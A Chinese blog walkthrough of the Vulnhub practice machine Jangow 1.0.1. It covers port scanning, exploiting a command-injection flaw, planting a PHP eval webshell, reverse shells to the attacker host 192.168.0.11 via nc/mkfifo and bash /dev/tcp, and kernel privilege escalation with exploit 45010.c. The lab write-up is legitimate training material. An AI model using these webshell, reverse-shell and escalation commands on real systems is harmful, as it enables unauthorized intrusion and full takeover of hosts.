IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 渗透测试Jangow1.0.1--入门级 -> 正文阅读

[PHP知识库]渗透测试Jangow1.0.1--入门级

渗透测试Jangow101(一)

一、环境搭建

1、靶机:ip:192.168.0.9

靶机下载:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova

2、攻击机:ip:192.168.0.11

3、如何搭建

下载后的文件直接右键打开方式,选择virtualbox(介意使用virtualbox)

image-20220325150146598

image-20220325150320467

使用virtualbox打开后会显示靶机ip

image-20220325150411961

二、信息收集

1、nmap扫描开放端口

nmap -sC -sV 192.168.0.9
-sV 扫描目标主机的端口和软件版本
-sC 根据端口识别服务自动调用默认脚本

image-20220325151528095

这里可以知道目标开启了21和80端口,分别是ftp服务和Apache服务

三、web渗透

1、漏洞发现

开启了80端口,部署的是Apache服务,先去访问一下web服务,看是否有漏洞

image-20220325151952039

在一个页面找到一个url地址存在参数,页面为空白,参数未被赋值,猜测可能是代码执行漏洞或者命令执行漏洞,经过探测发现是命令执行漏洞。

image-20220325152102036

2、漏洞利用

cat /etc/passwd

通过linux命令查看其账号密码

image-20220325152448446

虽然获取了文件内容,但是无法直接登录。既然可以执行linux命令,尝试写一句话木马直接getshell

echo '<?php @eval($_POST['shell']);?>' >> getshell.php
这里介意使用post方法,get方法蚁剑无法连接

image-20220325153002301

蚁剑连接

image-20220325153046443

连接成功

image-20220325153256760

收集信息,扩大战果

image-20220325153518774

image-20220325153635169

找到两个密码,但是并没有找到flag,应该值root目录,我们现在没有权限,尝试反弹shell,查看系统版本,使用系统内核漏洞提权

3、反弹shell

使用蚁剑新建一个php文件,写一个反弹shell在PHP文件里,使用kali监听对于端口,然后访问该文件,即可反弹shell

nc -lvp 443

image-20220325154630402

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.11 443 >/tmp/f');?>

<?php system('bash -i > /dev/tcp/192.168.0.11/443 0>&1 2>&1')?>
不知道为啥bash反弹不能使用

image-20220325154413017

访问该文件

image-20220325154749266

反弹成功

image-20220325154912812

切换完整的交互式bash

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20220325155134405

四、权限提升

1、查看系统版本

uname -a

image-20220325155455095

2、根据系统版本提权

searchsploit ubuntu 4.4.0

image-20220325155830777

3、采用45010.c这个文件进行提权

蚁剑将该文件上传到靶机

image-20220325160010557

4、提权

gcc 45010.c -o exp //生成可执行文件
chmod +x exp //添加可执行权限
./exp   //执行exp文件

image-20220325160356642

5、查询root目录

image-20220325160517500

发现proof.txt文件

image-20220325160603219

五、解密flag

在proof.txt文件中找到一串加密乱码,可能是md5加密后的flag,解密后可得flag

image-20220325160802361

解密为空密码,不知道为啥。。。

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-03-30 18:02:46  更:2022-03-30 18:04:56 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/18 16:24:59-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码